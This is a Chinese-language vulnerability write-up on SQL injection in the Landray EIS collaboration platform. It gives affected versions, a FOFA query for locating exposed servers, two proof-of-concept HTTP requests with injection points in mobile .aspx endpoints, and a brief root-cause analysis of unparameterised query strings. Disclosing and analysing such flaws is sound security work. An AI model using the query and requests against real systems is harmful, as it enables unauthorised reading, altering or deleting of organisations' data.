漏洞描述
蓝凌EIS智慧协助平台存在多处SQL注入。
蓝凌eis智慧协同平台是由深圳市微达软件有限公司开发的用于企业在知识,协同,项目管理等场景的OA系统。
影响版本
7.1.1.4—8.5.1.4
fofa语法
app="Landray-EIS智慧协同平台"
漏洞复现
路由1:
http://127.0.0.1:80/mobileapp/address/mobileposition.aspx?search=*
POC:
GET mobileapp/address/mobileposition.aspx?search=* HTTP/1.1
Host: 127.0.0.1:80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
路由2:
http://127.0.0.1:80/mobileapp/Task/task_view.aspx?id=%27=
GET mobileapp/Task/task_view.aspx?id=%27= HTTP/1.1
Host: 127.0.0.1:80
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
漏洞分析
漏洞点1:
SQL注入的风险主要集中在直接将用户输入(通过Request.QueryString获取)拼接到SQL查询语句中,没有进行预处理或使用参数化查询。
漏洞点2:
在于从Request.QueryString[“id”]直接获取的id值被用于构建SQL查询语句而未进行任何过滤或参数化处理这意味着,如果攻击者通过修改URL中的id参数值为恶意的SQL代码片段,他们可能能够执行未授权的数据库操作,如访问、修改或删除数据。
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容